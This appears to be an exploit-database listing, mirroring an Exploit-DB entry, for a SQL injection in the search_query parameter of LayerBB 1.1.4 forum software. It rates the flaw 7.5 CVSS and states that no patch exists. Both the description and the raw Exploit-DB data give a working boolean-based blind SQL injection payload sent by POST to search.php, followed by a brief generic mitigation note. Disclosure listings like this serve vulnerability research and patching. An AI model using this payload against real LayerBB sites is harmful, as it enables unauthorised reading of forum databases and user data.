header-logo
Suggest Exploit
vendor:
LayerBB
by:
Görkem Haşin
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: LayerBB
Affected Version From: 1.1.4
Affected Version To: 1.1.4
Patch Exists: NO
Related CWE: N/A
CPE: a:layerbb:layerbb:1.1.4
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Linux/Windows
2021

LayerBB 1.1.4 – ‘search_query’ SQL Injection

LayerBB 1.1.4 is vulnerable to a SQL injection vulnerability in the 'search_query' parameter. An attacker can send a specially crafted payload to the search.php page to exploit this vulnerability. The payload sent in the POST request is 'search_query=Lffd') AND 8460=(SELECT (CASE WHEN (8460=8460) THEN 8460 ELSE (SELECT 1560 UNION SELECT 2122) END))-- -&search_submit=Search'

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.
Source

Exploit-DB raw data:

# Exploit Title: LayerBB 1.1.4 - 'search_query' SQL Injection
# Date: 2021-02-19
# Exploit Author: Görkem Haşin
# Version: 1.1.4
# Tested on: Linux/Windows

# POST /search.php HTTP/1.1
# Host: Target

Payload: search_query=Lffd') AND 8460=(SELECT (CASE WHEN (8460=8460) THEN 8460 ELSE (SELECT 1560 UNION SELECT 2122) END))-- -&search_submit=Search

Navigation

Suggest Exploit

Services By CQR